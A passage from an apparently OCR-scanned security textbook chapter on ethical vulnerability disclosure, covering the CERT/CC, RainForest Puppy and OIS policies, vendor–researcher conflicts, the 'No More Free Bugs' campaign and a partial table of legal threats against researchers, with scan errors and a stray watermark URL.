The second player is the software vendor. The vendor develops the product and is 
responsible for its successful operation. The vendor is looked to by thousands of cus- 
tomers for technical expertise and leadership in the upkeep of its product. When a flaw 
is reported to the vendor, it is usually one of many that the vendor must deal with, and 
some fall through the cracks for one reason or another. 

The issue of public disclosure has created quite a stir in the computing industry 
because each group views the issue so differently. Many believe knowledge is the pub- 
lic's right and all security vulnerability information should be disclosed as a matter of 
principle. Furthermore, many consumers feel that the only way to truly get quick results 
from a large software vendor is to pressure it to fix the problem by threatening to make 
the information public. Vendors have had the reputation of simply plodding along and 
delaying the fixes until a later version or patch is scheduled for release, which will ad- 
dress the flaw. This approach doesn't always consider the best interests of consumers, 
however, as they must sit and wait for the vendor to fix a vulnerability that puts their 
business at risk. 
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The vendor looks at the issue from a different perspective. Disclosing sensitive in- 
formation about a software flaw causes two major problems. First, the details of the 
flaw will help hackers exploit the vulnerability. The vendor's argument is that if the is- 
sue is kept confidential while a solution is being developed, attackers will not know 
how to exploit the flaw. Second, the release of this information can hurt the company's 
reputation, even in circumstances when the reported flaw is later proven to be false. It 
is much like a smear campaign in a political race that appears as the headline story in a 
newspaper. Reputations are tarnished, and even if the story turns out to be false, a re- 
traction is usually printed on the back page a week later. Vendors fear the same conse- 
quence for massive releases of vulnerability reports. 

Because of these two distinct viewpoints, several organizations have rallied together 
to create policies, guidelines, and general suggestions on how to handle software vul- 
nerability disclosures. This chapter will attempt to cover the issue from all sides and 
help educate you on the fundamentals behind the ethical disclosure of software vulner- 
abilities. 

How Did We Get Here! 

Before the mailing list Bugtraq was created, individuals who uncovered vulnerabilities 
and ways to exploit them just communicated directly with each other. The creation of 
Bugtraq provided an open forum for these individuals to discuss the same issues and 
work collectively. Easy access to ways of exploiting vulnerabilities gave way to the nu- 
merous script-kiddie point-and-click tools available today, which allow people who do 
not even understand a vulnerability to exploit it successfully. Posting more and more 
vulnerabilities to this site has become a very attractive past time for hackers, crackers, 
security professionals, and others. Bugtraq led to an increase in attacks on the Internet, 
on networks, and against vendors. Many vendors were up in arms, demanding a more 
responsible approach to vulnerability disclosure. 

In 2002, Internet Security Systems (ISS) discovered several critical vulnerabilities in 
products like Apache web server, Solaris X Windows font service, and Internet Software 
Consortium BIND software. ISS worked with the vendors directly to come up with solu- 
tions. A patch that was developed and released by Sun Microsystems was flawed and 
had to be recalled. An Apache patch was not released to the public until after the vul- 
nerability was posted through public disclosure, even though the vendor knew about 
the vulnerability. Even though these are older examples, these types of activities — and 
many more like them — left individuals and companies vulnerable; they were victims of 
attacks and eventually developed a deep feeling of distrust of software vendors. Critics 
also charged that security companies, like ISS, have alternative motives for releasing 
this type of information. They suggest that by releasing system flaws and vulnerabilities, 
they generate "good press" for themselves and thus promote new business and in- 
creased revenue. 

Because of the failures and resulting controversy that ISS encountered, it decided to 
initiate its own disclosure policy to handle such incidents in the future. It created de- 
tailed procedures to follow when discovering a vulnerability and how and when that 
information would be released to the public. Although their policy is considered "re- 
sponsible disclosure," in general, it does include one important caveat — vulnerability 
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details would be released to its customers and the public at a "prescribed period of 
time" after the vendor has been notified. ISS coordinates their public disclosure of the 
flaw with the vendor's disclosure. This policy only fueled the people who feel that vul- 
nerability information should be available for the public to protect themselves. 

This dilemma, and many others, represents the continual disconnect among ven- 
dors, security companies, and gray hat hackers today. Differing views and individual 
motivations drive each group down various paths. The models of proper disclosure that 
are discussed in this chapter have helped these different entities to come together and 
work in a more concerted effort, but much bitterness and controversy around this issue 
remains. 




NOTE The range of emotion, the numerous debates, and controversy 
over the topic of full disclosure has been immense. Customers and security 
professionals alike are frustrated with software flaws that still exist in the 
products in the first place and the lack of effort from vendors to help in this 
critical area. Vendors are frustrated because exploitable code is continually 
released just as they are trying to develop fixes. We will not be taking one side 
or the other of this debate, but will do our best to tell you how you can help, 
and not hurt, the process. 



CERT’s Current Process 

The first place to turn to when discussing the proper disclosure of software vulnerabili- 
ties is the governing body known as the CERT Coordination Center ( CC ). CERT/CC is a 
federally funded research and development operation that focuses on Internet security 
and related issues. Established in 1988 in reaction to the first major vims outbreak on 
the Internet, the CERT/CC has evolved over the years, taking on more substantial roles 
in the industry, which includes establishing and maintaining industry standards for the 
way technology vulnerabilities are disclosed and communicated. In 2000, the organiza- 
tion issued a policy that outlined the controversial practice of releasing software vulner- 
ability information to the public. The policy covered the following areas: 

• Full disclosure will be announced to the public within 45 days of being 
reported to CERT/CC. This timeframe will be executed even if the software 
vendor does not have an available patch or appropriate remedy. The only 
exception to this rigid deadline will be exceptionally serious threats or 
scenarios that would require a standard to be altered. 

• CERT/CC will notify the software vendor of the vulnerability immediately so 
that a solution can be created as soon as possible. 

• Along with the description of the problem, CERT/CC will forward the name of 
the person reporting the vulnerability unless the reporter specifically requests 
to remain anonymous. 

• During the 45-day window, CERT/CC will update the reporter on the current 
status of the vulnerability without revealing confidential information. 
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CERT/CC states that its vulnerability policy was created with the express purpose of 
informing the public of potentially threatening situations while offering the software 
vendor an appropriate timeframe to fix the problem. The independent body further 
states that all decisions on the release of information to the public are based on what is 
best for the overall community. 

The decision to go with 45 days was met with controversy as consumers widely felt 
that was too much time to keep important vulnerability information concealed. The 
vendors, on the other hand, felt the pressure to create solutions in a short timeframe 
while also shouldering the obvious hits their reputations would take as news spread 
about flaws in their product. CERT/CC came to the conclusion that 45 days was suffi- 
cient enough time for vendors to get organized, while still taking into account the 
welfare of consumers. 

A common argument posed when CERT/CC announced their policy was, "Why re- 
lease this information if there isn't a fix available?" The dilemma that was raised is 
based on the concern that if a vulnerability is exposed without a remedy, hackers will 
scavenge the flawed technology and be in prime position to bring down users' systems. 
The CERT/CC policy insists, however, that without an enforced deadline there will be 
no motivation for the vendor to fix the problem. Too often, a software maker could 
simply delay the fix into a later release, which puts the consumer in a compromising 
position. 

To accommodate vendors and their perspective of the problem, CERT/CC performs 
the following: 

• CERT/CC will make good faith efforts to always inform the vendor before 
releasing information so there are no surprises. 

• CERT/CC will solicit vendor feedback in serious situations and offer that 
information in the public release statement. In instances when the vendor 
disagrees with the vulnerability assessment, the vendor's opinion will be 
released as well, so both sides can have a voice. 

• Information will be distributed to all related parties that have a stake in the 
situation prior to the disclosure. Examples of parties that could be privy to 
confidential information include participating vendors, experts that could 
provide useful insight, Internet Security Alliance members, and groups that 
may be in the critical path of the vulnerability. 

Although there have been other guidelines developed and implemented after 
CERT's model, CERT is usually the "middle man" between the bug finder and the ven- 
dor to try and help the process and enforce the necessary requirements of all of the 
parties involved. 




NOTE As of this writing, the model that is most commonly used is the 
Organization for Internet Safety (OIS) guidelines, which is covered later in 
this chapter. CERT works within this model when called upon by vendors 
or gray hats. 
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Reference 

The CERT/CC Vulnerability Disclosure Policy 

www.cert.org/kb/vul_disclosure.html 

Full Disclosure Policy — the RainForest 
Puppy Policy 

A full disclosure policy known as RainForest Puppy Policy (RFP) version 2, takes a harder 
line with software vendors than CERT/CC. This policy takes the stance that the reporter 
of the vulnerability should make an effort to contact the vendor so they can work to- 
gether to fix the problem, but the act of cooperating with the vendor is a step that the 
reporter is not required to take. Under this model, strict policies are enforced upon the 
vendor if it wants the situation to remain confidential. The details of the policy follow: 

• The issue begins when the originator (the reporter of the problem) e-mails the 
maintainer (the software vendor) with details about the problem. The moment 
the e-mail is sent is considered the date of contact. The originator is responsible 
for locating the maintainer's appropriate contact information, which can 
usually be obtained through the maintainer's website. If this information is 
not available, e-mails should be sent to one or all of the addresses shown next. 

These common e-mail formats should be implemented by vendors: 

security- alert@ [ maintainer] 
secure@ [maintainer] 
security@ [maintainer] 
support@ [maintainer] 
info @ [maintainer] 

• The maintainer will be allowed five days from the date of contact to reply to 
the originator. The date of contact is from the perspective of the originator of 
the issue, meaning if the person reporting the problem sends an e-mail from 
New York at 10:00 a.m. to a software vendor in Los Angeles, the time of contact 
is 10:00 a.m. Eastern time. The maintainer must respond within five days, 
which would be 7:00 a.m. Pacific time. An auto-response to the originator's 
e-mail is not considered sufficient contact. If the maintainer does not establish 
contact within the allotted timeframe, the originator is free to disclose the 
information. Once contact has been made, decisions on delaying disclosures 
should be discussed between the two parties. The RFP policy warns the vendor 
that contact should be made sooner rather than later. It reminds the software 
maker that the finder of the problem is under no obligation to cooperate, but 
is simply being asked to do so for the best interests of all parties. 

• The originator should make every effort to assist the vendor in reproducing 
the problem and adhering to reasonable requests. It is also expected that the 
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originator will show reasonable consideration if delays occur and if the vendor 
shows legitimate reasons why it will take additional time to fix the problem. 
Both parties should work together to find a solution. 

• It is the responsibility of the vendor to provide regular status updates every 
five days that detail how the vulnerability is being addressed. It should also be 
noted that it is solely the responsibility of the vendor to provide updates and 
not the responsibility of the originator to request them. 

• As the problem and fix are released to the public, the vendor is expected to 
credit the originator for identifying the problem. This gesture is considered a 
professional courtesy to the individual or company that voluntarily exposed 
the problem. If this good faith effort is not executed, the originator will have 
little motivation to follow these guidelines in the future. 

• The maintainer and the originator should make disclosure statements in 
conjunction with each other, so all communication will be free from conflict 
or disagreement. Both sides are expected to work together throughout the 
process. 

• In the event that a third party announces the vulnerability, the originator and 
maintainer are encouraged to discuss the situation and come to an agreement 
on a resolution. The resolution could include: the originator disclosing the 
vulnerability or the maintainer disclosing the information and available fixes 
while also crediting the originator. The full disclosure policy also recommends 
that all details of the vulnerability be released if a third party releases the 
information first. Because the vulnerability is already known, it is the 
responsibility of the vendor to provide specific details, such as the diagnosis, 
the solution, and the timeframe for a fix to be implemented or released. 

RainForest Puppy is a well-known hacker who has uncovered an amazing amount 
of vulnerabilities in different products. He has a long history of successfully, and at 
times unsuccessfully, working with vendors to help them develop fixes for the prob- 
lems he has uncovered. The disclosure guidelines that he developed came from his 
years of experience in this type of work and level of frustration that vendors not work- 
ing with individuals like himself experienced once bugs were uncovered. 

The key to these disclosure policies is that they are just guidelines and suggestions 
on how vendors and bug finders should work together. They are not mandated and 
cannot be enforced. Since the RFP policy takes a strict stance on dealing with vendors 
on these issues, many vendors have chosen not to work under this policy. So another 
set of guidelines was developed by a different group of people, which includes a long 
list of software vendors. 

Reference 

Full Disclosure Policy (RFPolicy) v2 (RainForest Puppy) 

www. wiretrip . net/ rfp/policy. html 
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Organization for Internet Safety (OIS) 

There are three basic types of vulnerability disclosures: full disclosure, partial disclo- 
sure, and nondisclosure. Each type has its advocates, and long lists of pros and cons can 
be debated regarding each type. CERT and RFP take a rigid approach to disclosure prac- 
tices; they created strict guidelines that were not always perceived as fair and flexible by 
participating parties. The Organization for Internet Safety (OIS) was created to help meet 
the needs of all groups and is the policy that best fits into a partial disclosure classifica- 
tion. This section will give an overview of the OIS approach, as well as provide the step- 
by-step methodology that has been developed to provide a more equitable framework 
for both the user and the vendor. 

A group of researchers and vendors formed the OIS with the goal of improving the 
way software vulnerabilities are handled. The OIS members included @stake, Bind- 
View Corp., The SCO Group, Foundstone, Guardent, Internet Security Systems, McAfee, 
Microsoft Corporation, Network Associates, Oracle Corporation, SGI, and Symantec. 
The OIS shut down after serving its purpose, which was to create the vulnerability 
disclosure guidelines. 

The OIS believed that vendors and consumers should work together to identify is- 
sues and devise reasonable resolutions for both parties. It tried to bring together a 
broad, valued panel that offered respected, unbiased opinions to make recommenda- 
tions. The model was formed to accomplish two goals: 

• Reduce the risk of software vulnerabilities by providing an improved method 
of identification, investigation, and resolution. 

• Improve the overall engineering quality of software by tightening the security 
placed upon the end product. 

Discovery 

The process begins when someone finds a flaw in the software. The flaw may be discov- 
ered by a variety of individuals, such as researchers, consumers, engineers, developers, 
gray hats, or even casual users. The OIS calls this person or group th e finder. Once the 
flaw is discovered, the finder is expected to carry out the following due diligence: 

1. Discover if the flaw has already been reported in the past. 

2. Look for patches or service packs and determine if they correct the problem. 

3. Determine if the flaw affects the product's default configuration. 

4. Ensure that the flaw can be reproduced consistently. 

After the finder completes this "sanity check" and is sure that the flaw exists, the 
issue should be reported. The OIS designed a report guideline, known as a vulnerability 
summary report (VSR), that is used as a template to describe the issues properly. The VSR 
includes the following components: 
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• Finder's contact information 

• Security response policy 

• Status of the flaw (public or private) 

• Whether or not the report contains confidential information 

• Affected products/versions 

• Affected configurations 

• Description of flaw 

• Description of how the flaw creates a security problem 

• Instructions on how to reproduce the problem 

Notification 

The next step in the process is contacting the vendor. This step is considered the most 
important phase of the plan according to the OIS. Open and effective communication 
is the key to understanding and ultimately resolving software vulnerabilities. The fol- 
lowing are guidelines for notifying the vendor. 

The vendor is expected to provide the following: 

• Single point of contact for vulnerability reports. 

• Contact information should be posted in at least two publicly accessible 
locations, and the locations should be included in their security response 
policy. 

• Contact information should include: 

• Reference to the vendor's security policy 

• A complete listing/instructions for all contact methods 

• Instructions for secure communications 

• Reasonable efforts to ensure that e-mails sent to the following formats are 
rerouted to the appropriate parties: 

• abuse@ [vendor] 

• postmaster@ [vendor] 

• sales @ [vendor] 

• info @ [vendor] 

• support@ [vendor] 

• A secure communication method between itself and the finder. If the finder 
uses encrypted transmissions to send a message, the vendor should reply in a 
similar fashion. 

• Cooperate with the finder, even if the finder uses insecure methods of 
communication. 
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The finder is expected to: 

• Submit any found flaws to the vendor by sending a VSR to one of the 
published points of contact. 

• Send the VSR to one or many of the following addresses, if the finder cannot 
locate a valid contact address: 

• abuse @ [vendor] 

• postmaster@ [vendor] 

• sales@ [vendor] 

• info@ [vendor] 

• supports@ [vendor] 

Once the VSR is received, some vendors will choose to notify the public that a flaw 
has been uncovered and that an investigation is underway. The OIS encourages vendors 
to use extreme care when disclosing information that could put users' systems at risk. 
Vendors are also expected to inform finders that they intend to disclose the information 
to the public. 

In cases where vendors do not wish to notify the public immediately, they still need 
to respond to the finders. After the VSR is sent, a vendor must respond directly to the 
finder within seven days to acknowledge receipt. If the vendor does not respond during 
this time period, the finder should then send a Request for Confirmation of Receipt (RFCR). 
The RFCR is basically a final warning to the vendor stating that a vulnerability has been 
found, a notification has been sent, and a response is expected. The RFCR should also 
include a copy of the original VSR that was sent previously. The vendor is then given 
three days to respond. 

If the finder does not receive a response to the RFCR in three business days, the 
finder can notify the public about the software flaw. The OIS strongly encourages both 
the finder and the vendor to exercise caution before releasing potentially dangerous 
information to the public. The following guidelines should be observed: 

• Exit the communication process only after trying all possible alternatives. 

• Exit the process only after providing notice (an RFCR would be considered an 
appropriate notice statement). 

• Reenter the process once the deadlock situation is resolved. 

The OIS encourages, but does not require, the use of a third party to assist with 
communication breakdowns. Using an outside party to investigate the flaw and stand 
between the finder and vendor can often speed up the process and provide a resolution 
that is agreeable to both parties. A third party can be comprised of security companies, 
professionals, coordinators, or arbitrators. Both sides must consent to the use of this 
independent body and agree upon the selection process. 

If all efforts have been made and the finder and vendor are still not in agreement, 
either side can elect to exit the process. The OIS strongly encourages both sides to con- 
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sider the protection of computers, the Internet, and critical infrastructures when decid- 
ing how to release vulnerability information. 

Validation 

The validation phase involves the vendor reviewing the VSR, verifying the contents, and 
working with the finder throughout the investigation. An important aspect of the vali- 
dation phase is the consistent practice of updating the finder on the investigation's 
status. The OIS provides some general rules to follow regarding status updates: 

• Vendor must provide status updates to the finder at least once every seven 
business days unless another arrangement is agreed upon by both sides. 

• Communication methods must be mutually agreed upon by both sides. 
Examples of these methods include telephone, e-mail, FTP site, etc. 

• If the finder does not receive an update within the seven-day window, it 
should issue a Request for Status (RFS). 

• The vendor then has three business days to respond to the RFS. 

The RFS is considered a courtesy, reminding the vendor that it owes the finder an 
update on the progress being made on the investigation. 

Investigation 

The investigation work that a vendor undertakes should be thorough and cover all re- 
lated products linked to the vulnerability. Often, the finder's VSR will not cover all as- 
pects of the flaw and it is ultimately the responsibility of the vendor to research all areas 
that are affected by the problem, which includes all versions of code, attack vectors, and 
even unsupported versions of software if these versions are still heavily used by con- 
sumers. The steps of the investigation are as follows: 

1. Investigate the flaw of the product described in the VSR. 

2. Investigate if the flaw also exists in supported products that were not included 
in the VSR. 

3. Investigate attack vectors for the vulnerability. 

4. Maintain a public listing of which products/versions the vendor currently 
supports. 

Shared Code Bases 

Instances have occurred where one vulnerability is uncovered in a specific product, 
but the basis of the flaw is found in source code that may spread throughout the in- 
dustry. The OIS believes it is the responsibility of both the finder and the vendor to 
notify all affected vendors of the problem. Although their Security Vulnerability Re- 
porting and Response Policy does not cover detailed instructions on how to engage 
several affected vendors, the OIS does offer some general guidelines to follow for this 
type of situation. 
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The finder and vendor should do at least one of the following action items: 

• Make reasonable efforts to notify each vendor known to be affected by the flaw. 

• Establish contact with an organization that can coordinate the 
communication to all affected vendors. 

• Appoint a coordinator to champion the communication effort to all affected 
vendors. 

Once the other affected vendors have been notified, the original vendor has the fol- 
lowing responsibilities: 

• Maintain consistent contact with the other vendors throughout investigation 
and resolution process. 

• Negotiate a plan of attack with the other vendors in investigating the flaw. 

The plan should include such items as frequency of status updates and 
communication methods. 

Once the investigation is underway, the finder may need to assist the vendor. Some 
examples of help that a vendor might need include: more detailed characteristics of the 
flaw, more detailed information about the environment in which the flaw occurred 
(network architecture, configurations, and so on), or the possibility of a third-party 
software product that contributed to the flaw. Because re-creating a flaw is critical in 
determining the cause and eventual solution, the finder is encouraged to cooperate 
with the vendor during this phase. 




NOTE Although cooperation is strongly recommended, the finder is required 
to submit a detailed VSR. 



Findings 

When the vendor finishes its investigation, it must return one of the following conclu- 
sions to the finder: 

• It has confirmed the flaw. 

• It has disproved the reported flaw. 

• It can neither prove nor disprove the flaw. 

The vendor is not required to provide detailed testing results, engineering practices, 
or internal procedures; however, it is required to demonstrate that a thorough, techni- 
cally sound investigation was conducted. The vendor can meet this requirement by 
providing the finder with: 

• A list of tested product/versions 

• A list of tests performed 

• The test results 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 



Chapter 3: Proper and Ethical Disclosure 

59 



Confirmation of the Flaw 

In the event that the vendor confirms the flaw does indeed exist, it must follow up this 
statement with the following action items: 

• A list of products/versions affected by the confirmed flaw 

• A statement on how a fix will be distributed 

• A timeframe for distributing the fix 

Disproof of the Flaw 

In the event that the vendor disproves the reported flaw, the vendor then must show the 
finder that one or both of the following are true: 

• The reported flaw does not exist in the supported product. 

• The behavior that the finder reported exists, but does not create a security 
concern. If this statement is true, the vendor should forward validation data to 
the finder, such as: 

• Product documentation that confirms the behavior is normal or 
nonthreatening. 

• Test results that confirm the behavior is only a security concern when the 
product is configured inappropriately. 

• An analysis that shows how an attack could not successfully exploit this 
reported behavior. 

The finder may choose to dispute this conclusion of disproof by the vendor. In this 
case, the finder should reply to the vendor with its own testing results that validate its 
claim and contradict the vendor's findings. The finder should also supply an analysis of 
how an attack could exploit the reported flaw. The vendor is responsible for reviewing 
the dispute, investigating it again, and responding to the finder accordingly. 

Unable to Confirm or Disprove the Flaw 

In the event the vendor cannot confirm or disprove the reported flaw, the vendor should 
inform the finder of the results and produce detailed evidence of any investigative work. 
Test results and analytical summaries should be forwarded to the finder. At this point, 
the finder can move forward in the following ways: 

• Provide code to the vendor that better demonstrates the proposed vulnerability. 

• If no change is established, the finder can move to release their VSR to the 
public. In this case, the finder should follow appropriate guidelines for 
releasing vulnerability information to the public (covered later in the chapter). 

Resolution 

In cases where a flaw is confirmed, the vendor must take proper steps to develop a solu- 
tion to fix the problem. Remedies should be created for all supported products and 
versions of the software that are tied to the identified flaw. Although not required by 
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either party, many times the vendor will ask the finder to provide assistance in evaluat- 
ing if a proposed remedy will be effective in eliminating the flaw. The OIS suggests the 
following steps when devising a vulnerability resolution: 

1. Vendor determines if a remedy already exists. If one exists, the vendor should 
notify the finder immediately. If not, the vendor begins developing one. 

2. Vendor ensures that the remedy is available for all supported products/versions. 

3. Vendors may choose to share data with the finder as it works to ensure the 
remedy will be effective. The finder is not required to participate in this step. 

Timeframe 

Setting a timeframe for delivery of a remedy is critical due to the risk that the finder and, 
in all probability, other users are exposed to. The vendor is expected to produce a rem- 
edy to the flaw within 30 days of acknowledging the VSR. Although time is a top prior- 
ity, ensuring that a thorough, accurate remedy is developed is equally important. The fix 
must solve the problem and not create additional flaws that will put both parties back 
in the same situation in the future. When notifying the finder of the target date for its 
release of a fix, the vendor should also include the following supporting information: 

• A summary of the risk that the flaw imposes 

• The remedy's technical details 

• The testing process 

• Steps to ensure a high uptake of the fix 

The 30-day timeframe is not always strictly followed, because the OIS documenta- 
tion outlines several factors that should be considered when deciding upon the release 
date for the fix. One of the factors is "the engineering complexity of the fix." What this 
equates to is that the fix will take longer if the vendor identifies significant practical 
complications in the process of developing the solution. For example, data validation 
errors and buffer overflows are usually flaws that can be easily recoded, but when the 
errors are embedded in the actual design of the software, then the vendor may actually 
have to redesign a portion of the product. 




CAUTION Vendors have released “fixes” that introduced new vulnerabilities 
into the application or operating system — you close one window and open 
two doors. Several times these “fixes” have also negatively affected the 
application’s functionality. So although putting the blame on the network 
administrator for not patching a system is easy, sometimes it is the worst 
thing that he or she could do. 



A vendor can typically propose one of two types of remedies: configuration changes 
or software changes. A configuration change involve giving the user instructions on 
how to change her program settings or parameters to effectively resolve the flaw. Soft- 
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ware changes, on the other hand, involve more engineering work by the vendor. Soft- 
ware changes can be divided into three main types: 

• Patches Unscheduled or temporary remedies that address a specific problem 
until a later release can completely resolve the issue. 

• Maintenance updates Scheduled releases that regularly address many 
known flaws. Software vendors often refer to these solutions as service packs, 
service releases, or maintenance releases. 

• Future product versions Large, scheduled software revisions that impact 
code design and product features. 

Vendors consider several factors when deciding which software remedy to imple- 
ment. The complexity of the flaw and the seriousness of its effects are major factors in 
deciding which remedy to implement. In addition, any established maintenance sched- 
ule will also weigh in to the final decision. For example, if a service pack was already 
scheduled for release in the upcoming month, the vendor may choose to address the 
flaw within that release. If a scheduled maintenance release is months away, the vendor 
may issue a specific patch to fix the problem. 




NOTE Agreeing upon how and when the fix will be implemented is often a 
major disconnect between finders and vendors. Vendors will usually want to 
integrate the fix into their already scheduled patch or new version release. 
Finders usually feel making the customer base wait this long is unfair and 
places them at unnecessary risk just so the vendor doesn’t incur more costs. 



Release 

The final step in the OIS Security Vulnerability Reporting and Response Policy is to re- 
lease information to the public. Information is assumed to be released to the overall 
general public at one time and not in advance to specific groups. OIS does not advise 
against advance notification but realizes that the practice exists in case-by-case instanc- 
es and is too specific to address in the policy. 

The main controversy surrounding OIS is that many people feel as though the 
guidelines were written by the vendors and for the vendors. Opponents have voiced 
their concerns that the guidelines allow vendors to continue to stonewall and deny 
specific problems. If the vendor claims that a remedy does not exist for the vulnerabil- 
ity, the finder may be pressured to not release the information on the discovered vul- 
nerability. 

Although controversy still surrounds the topic of the OIS guidelines, the guidelines 
provide good starting point. Essentially, a line has been drawn in the sand. If all soft- 
ware vendors use the OIS guidelines as their framework, and develop their policies to 
be compliant with these guidelines, then customers will have a standard to hold the 
vendors to. 
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Conflicts Will Still Exist 

The reasons for the common breakdown between the finder and the vendor are due to 
their different motivations and some unfortunate events that routinely happen. Those 
who discover vulnerabilities usually are motivated to protect the industry by identifying 
and helping remove dangerous software from commercial products. A little fame, ad- 
miration, and bragging rights are also nice for those who enjoy having their egos 
stroked. Vendors, on the other hand, are motivated to improve their product, avoid 
lawsuits, stay clear of bad press, and maintain a responsible public image. 

There's no question that software flaws are rampant. The Common Vulnerabilities 
and Exposures (CVE) list is a compilation of publicly known vulnerabilities, in its tenth 
year of publication. More than 40,000 bugs are catalogued in the CVE. 

Vulnerability reporting considerations include financial, legal, and moral ones for 
both researchers and vendors alike. Vulnerabilities can mean bad public relations for a 
vendor that, to improve its image, must release a patch once a flaw is made public. But, 
at the same time, vendors may decide to put the money into fixing software after it's 
released to the public, rather than making it perfect (or closer to perfect) beforehand. 
In that way, they use vulnerability reporting as after-market security consulting. 

Vulnerability reporting can get a researcher in legal trouble, especially if the re- 
searcher reports a vulnerability for software or a site that is later hacked. In 2006 at 
Purdue University, a professor had to ask students in his computing class not to tell 
him about bugs they found during class. He had been pressured by authorities to re- 
lease the name of a previous student in his class who had found a flaw, reported it, and 
later was accused of hacking the same site where he'd found the flaw. The student was 
cleared, after volunteering himself, but left his professor more cautious about openly 
discussing vulnerabilities. 

Vulnerability disclosure policies attempt to balance security and secrecy, while be- 
ing fair to vendors and researchers. Organizations like iDefense and ZD1 (discussed in 
detail later in the chapter in the section "iDefense and ZD1") attempt to create an equi- 
table situation for both researchers and vendors. But as technology has grown more 
complicated, so has the vulnerability disclosure market. 

As code has matured and moved to the Web, a new wrinkle has been added to vul- 
nerability reporting. Knowing what's a vulnerability on the Web — as web code is very 
customized, changes quickly, and interacts with other code — is harder. 

Cross-site scripting (XSS), for example, uses vulnerabilities on websites to insert 
code to client systems, which then executes on the website's server, ft might steal cook- 
ies or passwords or carry out phishing schemes, ft targets users, not systems — so locat- 
ing the vulnerability is, in this case, difficult, as is knowing how or what should be 
reported. Web code is easier to hack than traditional software code and can be lucrative 
for hackers. 

The prevalence of XSS and other similar types of attacks and their complexity also 
makes eliminating the vulnerabilities, if they are even found, harder. Because website 
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code is constantly changing, re-creating the vulnerability can be difficult. And, in these 
instances, disclosing these vulnerabilities might not reduce the risk of them being ex- 
ploited. Some are skeptical about using traditional vulnerability disclosure channels 
for vulnerabilities identified in website code. 

Legally, website code may differ from typical software bugs, too. A software applica- 
tion might be considered the user's to examine for bugs, but posting proof of discovery 
of a vulnerable Web system could be considered illegal because it isn't purchased like a 
specific piece of software is. Demonstrating proof of a web vulnerability may be consid- 
ered an unintended use of the system and could create legal issues for a vulnerability 
researcher. For a researcher, giving up proof-of-concept exploit code could also mean 
handing over evidence in a future hacking trial — code that could be seen as proof the 
researcher used the website in a way the creator didn't intend. 

Disclosing web vulnerabilities is still in somewhat uncharted territory, as the infra- 
structure for reporting these bugs, and the security teams working to fix them, are still 
evolving. Vulnerability reporting for traditional software is still a work in progress, too. 
The debate between full disclosure versus partial or no disclosure of bugs rages on. 
Though vulnerability disclosure guidelines exist, the models are not necessarily keep- 
ing pace with the constant creation and discovery of flaws. And though many disclosure 
policies have been written in the information security community, they are not always 
followed. If the guidelines aren't applied to real-life situations, chaos can ensue. 

Public disclosure helps improve security, according to information security expert 
Bruce Schneier. He says that the only reason vendors patch vulnerabilities is because of 
full disclosure, and that there's no point in keeping a bug a secret — hackers will dis- 
cover it anyway. Before full disclosure, he says, it was too easy for software companies 
to ignore the flaws and threaten the researcher with legal action. Ignoring the flaws was 
easier for vendors especially because an unreported flaw affected the software's users 
much more than it affected the vendor. 

Security expert Marcus Ranum takes a dim view of public disclosure of vulnerabili- 
ties. He says that an entire economy of researchers is trying to cash in on the vulnera- 
bilities that they find and selling them to the highest bidder, whether for good or bad 
purposes. His take is that researchers are constantly seeking fame and that vulnerability 
disclosure is "rewarding bad behavior," rather than making software better. 

But the vulnerability researchers who find and report bugs have a different take, 
especially when they aren't getting paid. Another issue that has arisen is that gray hats 
are tired of working for free without legal protection. 

“No More Free Bugs’* 

In 2009, several gray hat hackers — Charlie Miller, Alex Sotirov, and Dino Dai Zovi — 
publicly announced a new stance: "No More Free Bugs." They argue that the value of 
software vulnerabilities often doesn't get passed on to gray hats, who find legitimate, 
serious flaws in commercial software. Along with iDefense and ZDI, the software 
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vendors themselves have their own employees and consultants who are supposed to 
find and fix bugs. ("No More Free Bugs" is targeted primarily at the for-profit software 
vendors that hire their own security engineer employees or consultants.) 

The researchers involved in "No More Free Bugs" also argue that gray hat hackers 
are putting themselves at risk when they report vulnerabilities to vendors. They have no 
legal protection when they disclose a found vulnerability — so they're not only working 
for free, but also opening themselves up to threats of legal action, too. And, gray hats 
don't often have access to the right people at the software vendor, those who can create 
and release the necessary patches. For many vendors, vulnerabilities mainly represent 
threats to their reputation and bottom line, and they may stonewall researchers' over- 
tures, or worse. Although vendors create responsible disclosure guidelines for research- 
ers to follow, they don't maintain guidelines for how they treat the researchers. 

Furthermore, these researchers say that software vendors often depend on them to 
find bugs rather than investing enough in finding vulnerabilities themselves. It takes a 
lot of time and skill to uncover flaws in today's complex software and the founders of 
the "No More Free Bugs" movement feel as though either the vendors should employ 
people to uncover these bugs and identify fixes or they should pay gray hats who un- 
cover them and report them responsibly. 

This group of gray hats also calls for more legal options when carrying out and re- 
porting on software flaws. In some cases, gray hats have uncovered software flaws and 
the vendor has then threatened these individuals with lawsuits to keep them quiet and 
help ensure the industry did not find out about the flaws. Table 3-1, taken from the 
website http://attrition.org/errata/legal_threats/, illustrates different security flaws that 
have been uncovered and the responding resolution or status of report. 

Of course, along with iDefense and ZDI's discovery programs, some software ven- 
dors do guarantee researchers they won't pursue legal action for reporting vulnerabili- 
ties. Microsoft, for example, says it won't sue researchers "that responsibly submit 
potential online services security vulnerabilities." And Mozilla runs a "bug bounty pro- 
gram" that offers researchers a flat $500 fee (plus a t-shirt!) for reporting valid, critical 
vulnerabilities. In 2009, Google offered a cash bounty for the best vulnerability found 
in Native Client. 

Although more and more software vendors are reacting appropriately when vul- 
nerabilities are reported (because of market demand for secure products), many peo- 
ple believe that vendors will not spend the extra money, time, and resources to carry 
out this process properly until they are held legally liable for software security issues. 
The possible legal liability issues software vendors may or may not face in the future is 
a can of worms we will not get into, but these issues are gaining momentum in the 
industry. 
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When 


Company 
Making Threat 


Researchers 


Research 

Topic 


Resolution/ 

Status 


2009-07-18 


RSA 


Scott Jarkoff 


Lack of SSL on 
Navy Federal 
Credit Union 
Home Page 


C&D* sent to Mr. 
Jarkoff and his web 
host. Information 
still available online 
(2009-08-12). 


2009-07-17 


Comerica Bank 


Lance James 


XSS/phishing 
vulnerabilities on 
Comerica site 


C&D sent toTumblr, 
information removed 
but vulnerability 
still present (2009- 
07-17). 


2008-08- 1 3 


Sequoia Voting 
Systems 


Ed Felten 


Voting machine 
audit 


Research still not 
published (2008- 
10-02). 


2008-08-09 


Massachusetts Bay 
Transit Authority 
(MBTA) 


Zach Anderson, 

RJ Ryan, and 
Alessandro Chiesa 


Electronic fare 
payment (Charlie 
Card/Charlie 
Ticket) 


Gag order lifted, 
researchers hired 
